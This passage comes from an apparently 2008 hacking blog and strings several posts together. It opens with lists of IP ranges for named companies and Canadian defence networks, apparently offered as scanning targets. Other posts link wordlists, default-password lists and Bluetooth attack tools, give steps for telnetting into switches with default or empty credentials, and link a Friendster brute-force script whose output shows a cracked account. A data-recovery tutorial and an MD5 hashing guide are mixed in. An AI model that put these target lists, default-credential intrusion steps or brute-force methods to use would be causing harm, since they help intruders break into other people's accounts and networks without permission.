/>207.60.13.224 - 207.60.13.231 North Shore Data Services<br />207.60.13.232 - 207.60.13.239 Mas New Hampshire<br />207.60.14.0 - 207.60.14.255 J. A. Webster<br />207.60.15.0 - 207.60.15.127 Trilogic<br />207.60.16.0 - 207.60.16.255 Area 54<br />207.60.18.0 - 207.60.18.63 Vested Development Inc<br />207.60.18.64 - 207.60.18.127 Conventures<br />207.60.21.0 - 207.60.21.255 Don Law Company<br />207.60.22.0 - 207.60.22.255 Advanced Microsensors<br />207.60.28.0 - 207.60.28.63 Applied Business Center<br />207.60.28.64 - 207.60.28.127 Color and Design Exchange<br />207.60.36.8 - 207.60.36.15 Shaun McCusker<br />207.60.36.16 - 207.60.36.23 Town of Framingham<br />207.60.36.24 - 207.60.36.31 AB Software<br />207.60.36.32 - 207.60.36.39 Seabass Dreams Too Much, Inc<br />207.60.36.40 - 207.60.36.47 Next Ticketing<br />207.60.36.48 - 207.60.36.55 Dulsi<br />207.60.36.56 - 207.60.36.63 The Internet Access Company<br />207.60.36.64 - 207.60.36.71 Maguire Group<br />207.60.36.72 - 207.60.36.79 Cogenex<br />207.60.36.88 - 207.60.36.95 AKNDC<br />207.60.36.96 - 207.60.36.103 McGovern election commitee<br />207.60.36.104 - 207.60.36.111 Digital Equipment Corp<br />207.60.36.112 - 207.60.36.119 PTR - Precision Technologies<br />207.60.36.120 - 207.60.36.127 Extech<br />207.60.36.128 - 207.60.36.135 Manfreddi Architects<br />207.60.36.144 - 207.60.36.151 Parent Naffah<br />207.60.36.152 - 207.60.36.159 Darling Dolls Inc<br />207.60.36.160 - 207.60.36.167 Wright Communications<br />207.60.36.168 - 207.60.36.175 Principle Software<br />207.60.36.176 - 207.60.36.183 Chris Pet Store<br />207.60.36.184 - 207.60.36.191 Fifteen Lilies<br />207.60.36.192 - 207.60.36.199 All-Com Technologies<br />207.60.37.0 - 207.60.37.31 Cardio Thoracic Surgical Associates, P. A.<br />207.60.37.32 - 207.60.37.63 Preferred Fixtures Inc<br />207.60.37.64 - 207.60.37.95 Apple and Eve Distributors<br />207.60.37.96 - 207.60.37.127 Nelson Copy Supply<br />207.60.37.128 - 207.60.37.159 Boston Optical Fiber<br />207.60.37.192 - 207.60.37.223 Fantasia&amp;Company<br />207.60.41.0 - 207.60.41.255 Infoactive<br />207.60.48.0 - 207.60.48.255 Curry College<br />207.60.62.32 - 207.60.62.63 Alternate Power Source<br />207.60.62.64 - 207.60.62.95 Keystone Howley-White<br />207.60.62.128 - 207.60.62.159 Bridgehead Associates LTD<br />207.60.62.160 - 207.60.62.191 County Supply<br />207.60.62.192 - 207.60.62.223 NH Board of Nursing<br />207.60.64.0 - 207.60.64.63 Diversified Wireless Technologies<br />207.60.64.64 - 207.60.64.127 Phytera<br />207.60.66.0 - 207.60.66.15 The Network Connection<br />207.60.66.16 - 207.60.66.31 Young Refrigeration<br />207.60.66.32 - 207.60.66.47 Vision Appraisal Technology<br />207.60.66.48 - 207.60.66.63 EffNet Inc<br />207.60.66.64 - 207.60.66.79 Entropic Systems Inc<br />207.60.66.80 - 207.60.66.95 Finley Properties<br />207.60.66.96 - 207.60.66.111 Nancy Plowman Associates<br />207.60.66.112 - 207.60.66.127 Northeast Financial Strategies<br />207.60.66.128 - 207.60.66.143 Textnology Corp<br />207.60.66.144 - 207.60.66.159 Groton Neochem LLC<br />207.60.66.160 - 207.60.66.175 Tab Computers<br />207.60.66.176 - 207.60.66.191 Patrons Insurance<br />207.60.66.192 - 207.60.66.207 Chair City Web<br />207.60.66.208 - 207.60.66.223 Radex, Inc.<br />207.60.66.224 - 207.60.66.239 Robert Austein<br />207.60.66.240 - 207.60.66.255 Hologic Inc.<br />207.60.71.64 - 207.60.71.127 K-Tech International Inc.<br />207.60.71.128 - 207.60.71.191 Pan Communications<br />207.60.71.192 - 207.60.71.255 New England College of Finance<br />207.60.75.128 - 207.60.75.255 Absolve Technology<br />207.60.78.0 - 207.60.78.127 Extech<br />207.60.78.128 - 207.60.78.255 The Insight Group<br />207.60.83.0 - 207.60.83.255 JLM Technologies<br />207.60.84.0 - 207.60.84.255 Strategic Solutions<br />207.60.94.0 - 207.60.94.15 McWorks<br />207.60.94.32 - 207.60.94.47 Rooney RealEstate<br />207.60.94.48 - 207.60.94.63 Joseph Limo Service<br />207.60.94.64 - 207.60.94.79 The Portico Group<br />207.60.94.80 - 207.60.94.95 Event Travel Management Inc<br />207.60.94.96 - 207.60.94.111 Intellitech International<br />207.60.94.128 - 207.60.94.143 Orion Partners<br />207.60.94.144 - 207.60.94.159 Rainbow Software Solution<br />207.60.94.160 - 207.60.94.175 Grason Stadler Inc<br />207.60.94.192 - 207.60.94.207 Donnegan System<br />207.60.95.1 - 207.60.95.255 The Iprax Corp<br />207.60.102.0 - 207.60.102.63 Coporate IT<br />207.60.102.64 - 207.60.102.127 Putnam Technologies<br />207.60.102.128 - 207.60.102.191 Sycamore Networks<br />207.60.102.192 - 207.60.102.255 Bostek<br />2?7.6?.10?.128 - 207.60.103.255 Louis Berger and Associates<br />207.60.104.128 - 207.60.104.191 Hanson Data Systems<br />207.60.106.128 - 207.60.106.255 Giganet Inc.<br />207.60.107.0 - 207.60.107.255 Roll Systems<br />207.60.108.8 - 207.60.108.15 InternetQA<br />207.60.111.0 - 207.60.111.31 Reading Cooperative Bank<br />207.60.111.32 - 207.60.111.63 Edco collaborative<br />207.60.111.64 - 207.60.111.95 DTC Communications Inc<br />207.60.111.96 - 207.60.111.127 Mike Line<br />207.60.111.128 - 207.60.111.159 The Steppingstone Foundation<br />207.60.111.160 - 207.60.111.191 Caton Connector<br />207.60.111.192 - 207.60.111.223 Refron<br />207.60.111.224 - 207.60.111.255 Dolabany Comm Group<br />207.60.112.0 - 207.60.112.255 The CCS Companies<br />207.60.116.0 - 207.60.116.255 Continental PET Technologies<br />207.60.122.16 - 207.60.122.23 Corey &amp; Company Designers Inc<br />207.60.122.24 - 207.60.122.31 SAIC<br />207.60.122.32 - 207.60.122.39 Netserve Entertainment Group<br />207.60.122.40 - 207.60.122.47 Avici Systems Inc<br />207.60.122.48 - 207.60.122.55 Webrdwne<br />207.60.122.56 - 207.60.122.63 Reality and Wonder<br />207.60.122.64 - 207.60.122.71 Nishan Desilva<br />207.60.122.72 - 207.60.122.79 NemaSoft Inc<br />207.60.122.80 - 207.60.122.87 Patrick Murphy<br />207.60.122.88 - 207.60.122.95 Corey and Company<br />207.60.122.96 - 207.60.122.103 Ames Textile Corp<br />207.60.122.104 - 207.60.122.111 Publicom<br />207.60.127.0 - Northstar Technologies<br />207.60.128.0 - 207.60.128.255 Northstar Technologies<br />207.60.129.0 - 207.60.129.255 Sanga Corp<br />207.60.129.64 - 207.60.129.127 Fired Up Network<br />207.60.129.128 - 207.60.129.191 Integrated Data Solutions<br />207.60.129.192 - 207.60.129.255 Metanext<br />207.61.* WorldLinx Telecommunications, Inc., Canada<br />207.120.* BBN Planet, MA<br /><br />RANGE 208<br />208.240.xxx.xxx<br /><br />RANGE 209<br />209.35.* Interland, Inc., GA<br /><br />RANGE 212<br />212.56.107.22<br />212.143 *** israelis isp's!! dont try those ranges!!<br />212.149.*** israelis isp's!! dont try those ranges!!<br />212.159.0.2<br />212.159.1.1<br />212.159.1.4<br />212.159.1.5<br />212.159.0.2<br />212.159.1.1<br />212.159.1.4<br />212.159.1.5<br />212.159.33.56<br />212.159.40.211<br />212.159.41.173<br />212.179.*** israelis isp's!! dont try those ranges!!<br />212.208.0.12.*** israelis isp's!! dont try those ranges!!<br /><br />RANGE 213<br />213.8.***.*** israelis isp's!! dont try those ranges!!<br /><br />RANGE 216<br />216.25.* 216.94.***.*** 216.247.* 216.248.*.* 217<br />217.6.* Do not scan<br /><br />--------------------------------<br /><br />And from our Canadian friends...<br /><br />192.139.201.0 - 192.139.201.24 : Government of Canada<br />192.139.202.0 - 192.139.202.24 : Government of Canada<br />192.139.203.0 - 192.139.203.24 : Government of Canada<br />192.139.204.0 - 192.139.204.24 : Government of Canada<br />192.197.83.0 - 192.197.83.24 : Government of Canada<br />198.103.0.0 - 198.103.0.16 : Government of Canada<br /><br />128.43.0.0 - 128.43.0.16 : Canadian Department of National Defense (DND)<br />131.132.0.0 - 131.132.0.16 : Canadian Department of National Defense (DND)<br />131.133.0.0 - 131.133.0.16 : Canadian Department of National Defense (DND)<br />131.134.0.0 - 131.134.0.16 : Canadian Department of National Defense (DND)<br />131.135.0.0 - 131.135.0.16 : Canadian Department of National Defense (DND)<br />131.136.0.0 - 131.136.0.16 : Canadian Department of National Defense (DND)<br />131.137.0.0 - 131.137.0.16 : Canadian Department of National Defense (DND)<br />131.138.0.0 - 131.138.0.16 : Canadian Department of National Defense (DND)<br />131.139.0.0 - 131.139.0.16 : Canadian Department of National Defense (DND)<br />131.140.0.0 - 131.140.0.16 : Canadian Department of National Defense (DND)<br />131.141.0.0 - 131.141.0.16 : Canadian Department of National Defense (DND)<br />192.5.144.0 - 192.5.144.24 : Canadian Department of National Defense (DND)<br />192.12.98.0 - 192.12.98.24 : Canadian Department of National Defense (DND)<br />192.12.215.0 - 192.12.215.24 : Canadian Department of National Defense<br />(DND)<br />192.16.205.0 - 192.16.205.24 : Canadian Department of National Defense<br />(DND)<br />192.16.206.0 - 192.16.206.24 : Canadian Department of National Defense<br />(DND)<br />192.16.207.0 - 192.16.207.24 : Canadian Department of National Defense<br />(DND)<br />192.16.208.0 - 192.16.208.24 : Canadian Department of National Defense<br />(DND)<br />192.16.242.0 - 192.16.242.24 : Canadian Department of National Defense<br />(DND)<br />192.16.243.0 - 192.16.243.24 : Canadian Department of National Defense<br />(DND)<br />192.35.144.0 - 192.35.144.24 : Canadian Department of National Defense<br />(DND)<br />192.42.68.0 - 192.42.68.24 : Canadian Department of National Defense (DND)<br /><br />TCLH autor</span><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8559681578113508762-1417864841785548010?l=yudhax2.blogspot.com' alt='' /></div>yudhadewahttp://www.blogger.com/profile/08277124415735596166noreply@blogger.com0tag:blogger.com,1999:blog-8559681578113508762.post-30567056497104172362008-04-24T09:25:00.002+07:002008-05-13T05:03:39.091+07:00<blockquote> <p><a href="ftp://ftp.cerias.purdue.edu/pub/dict" target="_blank"><u><span style="color: rgb(0, 0, 255);">ftp://ftp.cerias.purdue.edu/pub/dict</span></u></a> </p> <p><a href="ftp://ftp.ox.ac.uk/pub/wordlists" target="_blank"><span style="color: rgb(0, 0, 255);"><u>ftp://ftp.ox.ac.uk/pub/wordlists</u></span></a></p> <p><a href="http://packetstormsecurity.nl/Crackers/wordlists" target="_blank"><span style="color: rgb(0, 0, 255);"><u>http://packetstormsecurity.nl/Crackers/wordlists</u></span></a></p> <p><a href="http://www.outpost9.com/files/WordLists.html" target="_blank"><u><span style="color: rgb(0, 0, 255);">www.outpost9.com/files/WordLists.html</span></u></a></p> <p>Default vendor passwords<br /><a href="http://www.cirt.net/cgi-bin/passwd.pl" target="_blank"><u><span style="color: rgb(0, 0, 255);">www.cirt.net/cgi-bin/passwd.pl</span></u></a></p><p><br /></p><p><a href="http://www.cirt.net/cgi-bin/passwd.pl" target="_blank"><u><span style="color: rgb(0, 0, 255);"><span style="font-weight: bold;">by: </span></span></u></a><u><span style="color: rgb(0, 0, 255);"><a href="http://hackersparadise.synthasite.com/">http://hackersparadise.synthasite.com</a><br /></span></u></p></blockquote><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8559681578113508762-3056705649710417236?l=yudhax2.blogspot.com' alt='' /></div>yudhadewahttp://www.blogger.com/profile/08277124415735596166noreply@blogger.com0tag:blogger.com,1999:blog-8559681578113508762.post-32347782795362419402008-04-24T09:20:00.001+07:002008-05-13T05:04:20.610+07:00<blockquote> <p>BlueScanner<br /><a href="http://www.networkchemistry.com/products/bluescanner.php" target="_blank"><u><span style="color: rgb(0, 0, 255);">www.networkchemistry.com/products/bluescanner.php</span></u></a></p> <p>Bluesnarfer<br /><a href="http://www.alighieri.org/tools/bluesnarfer.tar.gz" target="_blank"><u><span style="color: rgb(0, 0, 255);">www.alighieri.org/tools/bluesnarfer.tar.gz</span></u></a></p> <p>BlueSniper rifle<br /><a href="http://www.tomsnetworking.com/2005/03/08/how_to_bluesniper_pt" target="_blank"><u><span style="color: rgb(0, 0, 255);">www.tomsnetworking.com/2005/03/08/how_to_bluesniper_pt</span></u></a></p> <p>Blooover<br /><a href="http://trifinite.org/trifinite_stuff_blooover.html" target="_blank"><u><span style="color: rgb(0, 0, 255);">http://trifinite.org/trifinite_stuff_blooover.html</span></u></a></p> <p>Bluejacking community site<br /><a href="http://www.bluejackq.com/" target="_blank"><u><span style="color: rgb(0, 0, 255);">www.bluejackq.com</span></u></a></p> <p>Detailed presentation on the various Bluetooth attacks<br /><a href="http://trifinite.org/Downloads/21c3_Bluetooth_Hacking.pdf" target="_blank"><u><span style="color: rgb(0, 0, 255);">http://trifinite.org/Downloads/21c3_Bluetooth_Hacking.pdf</span></u></a></p> <p>NIST Special Publication 800-48<br /><a href="http://csrc.nist.gov/publications/nistpubs/800-48/NIST_SP_800-48.pdf" target="_blank"><u><span style="color: rgb(0, 0, 255);">http://csrc.nist.gov/publications/nistpubs/800-48/NIST_SP_800-48.pdf</span></u></a></p></blockquote><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8559681578113508762-3234778279536241940?l=yudhax2.blogspot.com' alt='' /></div>yudhadewahttp://www.blogger.com/profile/08277124415735596166noreply@blogger.com0tag:blogger.com,1999:blog-8559681578113508762.post-33844901206008561432008-04-24T08:09:00.002+07:002008-04-24T08:38:37.442+07:00<span style="font-family:arial;">Apakah Anda pernah secara tidak sengaja </span><strong style="font-family: arial;">menghapus file Anda</strong><span style="font-family:arial;">, kemudian sudah meng-empty recycle bin? Atau Anda telah mem-</span><strong style="font-family: arial;">format hard disk</strong><span style="font-family:arial;"> tapi ingin data Anda kembali? Atau </span><strong style="font-family: arial;">data hilang</strong><span style="font-family:arial;"> / </span><strong style="font-family: arial;">rusak</strong><span style="font-family:arial;"> karena virus? Atau karena komputer mati atau restart tiba-tiba? Ada </span><strong style="font-family: arial;">cara untuk mengembalikan data yang hilang</strong><span style="font-family:arial;">, yaitu dengan satu software yang sangat lengkap, yaitu </span><strong style="font-family: arial;">Ontrack EasyRecovery Professional</strong><span style="font-family:arial;">. Inilah cara-cara mengembalikan data Anda yang hilang . </span><span id="more-109" style="font-family:arial;"></span> <div style="text-align: justify; font-family: arial;">Pertama Anda harus download dulu software tersebut, silakan klik di sini untuk <a title="Download Ontrack Data recovery" href="http://www.softpedia.com/progDownload/EasyRecovery-Professional-Standard-Edition-Download-58797.html" target="_blank">download software Ontrack Easy Recovery Professional</a>. Pilih External Mirror #1. </div> <div style="text-align: justify; font-family: arial;"><strong><br /></strong></div> <div style="text-align: justify; font-family: arial;"><strong>Jika data Anda yang hilang di drive C:, sebaiknya install di komputer atau sistem operasi lain. Jika data yang hilang di drive selain C:, Anda bisa menginstall software ini di mana saja di komputer yang sama, asalkan tidak berada salam satu drive dengan data yang hilang tadi.</strong></div> <div style="text-align: justify; font-family: arial;"> </div> <div style="text-align: justify; font-family: arial;">Software ini menyediakan sebuah solusi yang sangat komplit sehubungan dengan data yang hilang atau urusan recovery data yang hilang karena:</div> <div style="text-align: justify; font-family: arial;"> <ol><li>Virus.</li><li>Sektor yang tidak terbaca</li><li>Kesalahan aplikasi, system, atau shut down yang tidak normal.</li><li>Kerusakan pada critical area.</li><li>Ter-format</li><li>Penyebab lain yang memungkinkan hilangnya data.</li></ol> </div> <div style="text-align: justify; font-family: arial;">Software ini di-install pada Windows 98 SE, Me, 2000, or XP, dan dapat me-recover data untuk pada semua sistem windows. Software ini memiliki empat feature utama, yaitu:</div> <div style="text-align: justify; font-family: arial;"> <ol><li><a title="Mengembalikan data hilang" href="http://tutorialgratis.wordpress.com/2008/04/04/cara-mengembalikan-data-hilang/" target="_self"><strong>Disk Diagnostics</strong></a>, yaitu tool untuk mengecek kondisi hardisk Anda apakah masih bagus atau tidak.</li><li><strong><a title="Data recovery" href="http://tutorialgratis.wordpress.com/2008/04/04/cara-mengembalikan-data-hilang/" target="_self">Data Recovery</a>,</strong> yaitu tool untuk mengembalikan data / file karena terhapus, terformat, dan sebagainya.</li><li><a title="Email recovery" href="http://tutorialgratis.wordpress.com/2008/04/04/cara-mengembalikan-data-hilang/" target="_self"><strong>Email Repair</strong></a>, yaitu tool untuk mengembalikan data email Outlook Express yang terhapus atau rusak.</li><li><a title="Memperbaiki file yang rusak" href="http://tutorialgratis.wordpress.com/2008/04/04/cara-mengembalikan-data-hilang/" target="_self"><strong>File Repair</strong></a>, yaitu tool untuk memperbaiki data / file Microsoft Word, Excel, Access, PowerPoint, dan ZIP (winzip) file yang rusak karena virus atau sebab lain.</li></ol> </div> <div style="text-align: justify; font-family: arial;">Mari kita lihat satu per satu fasilitas yang ada dalam software ini.</div> <div style="text-align: justify; font-family: arial;"><a title="Disk diagnostic" href="http://tutorialgratis.wordpress.com/2008/04/04/cara-mengembalikan-data-hilang/" target="_self"><strong>1. Disk Diagnostics</strong></a></div> <div style="text-align: justify; font-family: arial;"><img style="width: 424px; height: 314px;" src="http://tutorialgratis.files.wordpress.com/2008/04/data-hilang-disk-diagnostics.gif" alt="Data hilang - Disk Diagnostics" /></div> <div style="text-align: justify; font-family: arial;">Tool yang ada dalam Disk Diagnostics ini adalah:</div> <div style="text-align: justify; font-family: arial;"> <ul><li><strong>Data Advisor</strong>, untuk membuat disket recovery.</li><li><strong>Drive Tests</strong>, untuk mengetes kondisi fisik dari hard disk (disk drive).</li><li><strong>Jumper Viewer</strong>, untuk melihat posisi jumper pada hard disk.</li><li><strong>Partition Tests</strong>, untuk mengecek kondisi partisi hardisk.</li><li><strong>Size Manager</strong>, untuk melihat kapasitas hard disk</li><li><strong>SMART Tests</strong>, digunakan untuk mengetes kondisi <strong>S</strong>elf-<strong>M</strong>onitoring, <strong>A</strong>nalysis and <strong>R</strong>eporting <strong>T</strong>echnology pada suatu hardisk.</li></ul> </div> <div style="text-align: justify; font-family: arial;"><a title="Data recovery" href="http://tutorialgratis.wordpress.com/2008/04/04/cara-mengembalikan-data-hilang/" target="_self"><strong>2. Data Recovery</strong></a></div> <div style="text-align: justify; font-family: arial;"><img style="width: 420px; height: 311px;" src="http://tutorialgratis.files.wordpress.com/2008/04/data-hilang-data-recovery.gif" alt="Data hilang - data recovery" /></div> <div style="text-align: justify; font-family: arial;">Tool-tool yang ada dalam Data Recovery ini adalah:</div> <div style="text-align: justify; font-family: arial;"> <ul><li><strong>Advanced Recovery</strong>, untuk mencari data yang sudah tidak dapat di-recover dengan tool lain, yaitu karena ter-format, ter-partisi, virus, atau hal lain.</li><li><strong>Deleted Recovery</strong>, untuk mencari data yang sudah dihapus. Ini adalah tool yang paling sering dipakai <a title="Oka Mahendra profile" href="http://tutorialgratis.wordpress.com/about" target="_blank">penulis</a>.</li><li><strong>Format Recovery</strong>, untuk mencari data pada hard disk yang sudah di-format.</li><li><strong>Raw Recovery</strong>, untuk mencari file yang hilang berdasarkan signature.</li><li><strong>Resume Recovery</strong>, semua proses recovery dapat dihentikan sementara dan dilanjutkan pada lain waktu.</li><li><strong>Emergency Media</strong>, untuk membuat disket atau CD yang digunakan untuk me-recover data / file hilang.</li></ul> </div> <div style="text-align: justify; font-family: arial;"><a title="Email repair" href="http://tutorialgratis.wordpress.com/2008/04/04/cara-mengembalikan-data-hilang/" target="_self"><strong>3. Email Repair</strong></a>, digunakan untuk mengembalikan data email Outlook dan Outlook Express yang hilang.</div> <div style="text-align: justify; font-family: arial;"><img style="width: 415px; height: 309px;" src="http://tutorialgratis.files.wordpress.com/2008/04/data-hilang-email-repair.gif" alt="Data hilang - email repair" /></div> <div style="text-align: justify; font-family: arial;"><a title="File repair" href="http://tutorialgratis.wordpress.com/2008/04/04/cara-mengembalikan-data-hilang/" target="_self"><strong>4. File Repair</strong></a>, digunakan untuk mengembalikan file-file Microsoft Office dan ZIP yang rusak. Tool ini dapat memperbaiki file Microsoft Word, Excel, Access, PowerPoint, dan ZIP (winzip) file yang corrupt / rusak karena virus atau sebab lain.</div> <div style="text-align: justify; font-family: arial;"><img style="width: 417px; height: 310px;" src="http://tutorialgratis.files.wordpress.com/2008/04/data-hilang-file-repair.gif" alt="Data hilang - file repair" /></div> <div style="text-align: justify; font-family: arial;">Data atau file yang hilang lebih sulit di-recover jika:</div> <div style="text-align: justify; font-family: arial;"> <ol><li>Anda menambahkan file baru setelah Anda menghapus atau memformat hard disk.</li><li>Anda menggunakan FAT32 dalam Windows XP.</li></ol> </div> <div style="text-align: justify; font-family: arial;">Demikian cara mengembalikan data yang hilang dengan software EasyRecovery Professional. Semoga data Anda bisa diselamatkan.</div> <div style="text-align: justify; font-family: arial;"> <p>Thanks to:<br /></p><p>Penulis: <a title="Oka Mahendra profile" href="http://tutorialgratis.wordpress.com/about/" target="_self">Oka Mahendra</a> (<a title="Tutorial Gratis" href="http://tutorialgratis.wordpress.com/" target="_self">http://tutorialgratis.wordpress.com</a>)</p><br /><p><br /></p><p><br /></p> </div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8559681578113508762-3384490120600856143?l=yudhax2.blogspot.com' alt='' /></div>yudhadewahttp://www.blogger.com/profile/08277124415735596166noreply@blogger.com0tag:blogger.com,1999:blog-8559681578113508762.post-38530689309673205922008-04-23T20:02:00.001+07:002008-05-13T05:04:53.455+07:00<h3>Using the md5 and sha1 hash functions </h3> <p>If you're using a login script on your site you probably store usernames and passwords in a database for authenticating the login.</p><p>For security reasons, you should never store these as plain text but should encrypt them with a one-way hash function such as md5 or sha1. </p><p>As neither of these funtions are included with ASP, you'll need to download and unzip the hash function you want to use and upload it to your webspace.</p><p>To use the functions, include the file in the pages you want to use hashing.</p><p class="code"><!--#include file="md5.asp"--> or <!--#include file="sha1.asp"--></p><p>Then you simply call the function with either:<br /><% MD5("string") or SHA1("string") %></p><p>For example, if you wanted to encrypt a Username and Password on a signup form, you would collect the Username and Password from the submitted form, hash them and then insert the hashed values into your database </p><p class="code"><% strHashedUsername = MD5(Request.Form("Username")) strHashedPassword = MD5(Request.Form("Password")) %></p><p>To authenticate a user who is attempting to sign in, Hash the username and Password from the form and compare these with the <span class="highlight">strHashedUsername</span> and <span class="highlight">strHashedPassword</span> stored in your database.</p><p>If a user forgets their password you'll need to generate a new, pseudo-random password for the user as hashing is one-way can't be unencrypted.</p><br /><p>Download <a href="http://www.markvoss.net/statistics/track.asp?mtr=/scripts/downloads/md5.zip">md5.zip</a><br />Download <a href="http://www.markvoss.net/statistics/track.asp?mtr=/scripts/downloads/sha1.zip">sha1.zip</a></p><p>[markvoss]<br /></p><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8559681578113508762-3853068930967320592?l=yudhax2.blogspot.com' alt='' /></div>yudhadewahttp://www.blogger.com/profile/08277124415735596166noreply@blogger.com0tag:blogger.com,1999:blog-8559681578113508762.post-74551078007645278322008-04-20T09:09:00.005+07:002008-05-13T05:05:20.913+07:00this will be straight post , i’ll share you the latest video hacking tutorial from milw0rm.com. it’s Advanced Mysql Injection in Joomla by bi_gys, it tested localy to prove the bug. it provide the the bug and complete step how to use this bug. and why i share here, cause some people doesn’t know how to download the vidoe from milw0m.so to help you you can download the damn video here. LoL<br /><div style="text-align: center;"><object width="320" height="266" class="BLOG_video_class" id="BLOG_video-fe5cdbfee5a779d3" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="movie" value="http://www.youtube.com/get_player"><param name="bgcolor" value="#FFFFFF"><param name="allowfullscreen" value="true"><param name="flashvars" value="flvurl=http://v1.nonxt5.googlevideo.com/videoplayback?id%3Dfe5cdbfee5a779d3%26itag%3D5%26app%3Dblogger%26ip%3D0.0.0.0%26ipbits%3D0%26expire%3D1329942550%26sparams%3Did,itag,ip,ipbits,expire%26signature%3D7F08390C4CD52C143821EC77AA93C34CF10680A0.F34EF2B6E7813FBC08D627043D68C9870BA1445%26key%3Dck1&amp;iurl=http://video.google.com/ThumbnailServer2?app%3Dblogger%26contentid%3Dfe5cdbfee5a779d3%26offsetms%3D5000%26itag%3Dw160%26sigh%3D1yRrW5emqu1BZYCkygCJnZN7NNU&amp;autoplay=0&amp;ps=blogger"><embed src="http://www.youtube.com/get_player" type="application/x-shockwave-flash"width="320" height="266" bgcolor="#FFFFFF"flashvars="flvurl=http://v1.nonxt5.googlevideo.com/videoplayback?id%3Dfe5cdbfee5a779d3%26itag%3D5%26app%3Dblogger%26ip%3D0.0.0.0%26ipbits%3D0%26expire%3D1329942550%26sparams%3Did,itag,ip,ipbits,expire%26signature%3D7F08390C4CD52C143821EC77AA93C34CF10680A0.F34EF2B6E7813FBC08D627043D68C9870BA1445%26key%3Dck1&iurl=http://video.google.com/ThumbnailServer2?app%3Dblogger%26contentid%3Dfe5cdbfee5a779d3%26offsetms%3D5000%26itag%3Dw160%26sigh%3D1yRrW5emqu1BZYCkygCJnZN7NNU&autoplay=0&ps=blogger"allowFullScreen="true" /></object><br />Enjoyed<br /></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8559681578113508762-7455107800764527832?l=yudhax2.blogspot.com' alt='' /></div>yudhadewahttp://www.blogger.com/profile/08277124415735596166noreply@blogger.com0tag:blogger.com,1999:blog-8559681578113508762.post-30445597173364147362008-04-20T09:06:00.001+07:002008-05-13T05:05:47.225+07:00the hacking technique that i will tell to you is very old technique , what we will do is very depend of your luck. :D but we also have some literatur to make you success percentage become higher. what you only need to know is the type and the brand of the Switch and Router. if you don’t know it you still have a chance to get “in” but it not easy of course.the first technique i tell(you know the type and brand the target) you is depend of your luck because it will brute force.but the second is depend of your skill fo “social enginering”. this technique is not common hacking technique it not need any tools. its just use your head. your intellegence will tested here because you need to guess the passowrd and the username with only chat and asking random question to the network administrator. you now , yesterday i read some one post that tell that we can hack yahoo! or hotmail email just use this technique. of course we can , but it very difficult to guess the password since we may only have to pick one password from everthing you can think!!.First how can we hack a switch just use one tools . and this tools is very common tools.we will use port scanner. and this is the step :<br /><br /> * Scan your Local Network using some tools you can use Angry IP Scanner like i do. and you only need Scanning for OPEN port 23.this port is usually use for switch<br /> * after getting the IP you can try the telnet connection to that IP. <span style="font-weight: bold;">telnet [IP target] 23</span><br /><br />and now your intellegence will tested. of course we don’t know the username and password for that switch. but i bet the username “administrator” or “admin” that standart username for network engine like that will work. you can use one of that username and now all depend of your luck. to higher our chance to get pass you can read the default password list for all type.but i dont have the list of default password for switch so you need to use “social enginering” technique. good luck :D just incase try to keep the password (empthy) maybe it will work.because it works for me.. :D<br /><br />and now for Router. luckly i have the list of default pasword for Router. and it hundreds !! and over. you can chose one of this. or you can read here <a href="http://backtrackbox.com/wp-content/uploads/2008/02/router-default-password">router-default-password.</a> that al l happy hacking..<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8559681578113508762-3044559717336414736?l=yudhax2.blogspot.com' alt='' /></div>yudhadewahttp://www.blogger.com/profile/08277124415735596166noreply@blogger.com1tag:blogger.com,1999:blog-8559681578113508762.post-63447275449056638922008-04-20T08:34:00.002+07:002008-05-13T05:06:35.060+07:00To download this Friendster.com Password BruteForce Script , you can get it directly from<a target="_blank" href="http://www.darkc0de.com/bruteforce/friendsterbf.py"> http://www.darkc0de.com/bruteforce/friendsterbf.py</a> .<br /><br /><br /><p>Another Friendster hacking post .. (I’m actually tired of this topic , but since most of the visitors of this blog have asked me a lot about Friendster hacking topics through email , I decided to keep posting on this topic <img src="http://www.lifedork.com/wp-includes/images/smilies/icon_smile.gif" alt=":)" class="wp-smiley" /> )</p> <p>Today I just want to share a python script that I found in the wild , It’s called Friendster.com BruteForce . And as You expected , it’s a script to automate the bruteforce attack against Friendster.com ’s login form . That’s How you would break into someone’s Friendster.com account.</p> <p>The preview of the working script :<br /><span id="more-235"></span></p> <p> [+] Testing Proxy…<br />[+] Proxy: 148.233.159.58:3128<br />[+] Verbose Mode On</p> <p>[+] BruteForcing: http://www.friendster.com/login.php<br />[+] Email: <censored>@yahoo.com<br />[+] Words Loaded: 2290</censored></p> <p>[-] Login Failed: 12345<br />[-] Login Failed: abc123<br />[-] Login Failed: password<br />[-] Login Failed: passwd<br />[-] Login Failed: 123456<br />[-] Login Failed: newpass<br />[-] Login Failed: notused<br />[-] Login Failed: Hockey<br />[-] Login Failed: internet<br />[-] Login Failed: asshole<br />[-] Login Failed: Maddock<br />[-] Login Failed: 12345678<br />[-] Login Failed: newuser<br />[-] Login Failed: computer<br />[-] Login Failed: Internet<br />[-] Login Failed: Mickey<br />[-] Login Failed: qwerty<br />[-] Login Failed: fiction<br />[-] Login Failed: Cowboys<br />[-] Login Failed: Jordan<br />[-] Login Failed: Hatton<br />[-] Login Failed: test<br />[-] Login Failed: Michael<br />[-] Login Failed: ou812<br />[-] Login Failed: orange<br />[-] Login Failed: 1234<br />[-] Login Failed: Beavis<br />[-] Login Failed: 123<br />[-] Login Failed: tigger<br />HTTP Error 500: Server Error</p>[!] Login Successfull: <censored>@yahoo.com Soccer</censored><p><br /></p><br /><p><br /></p><p><br /></p><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8559681578113508762-6344727544905663892?l=yudhax2.blogspot.com' alt='' 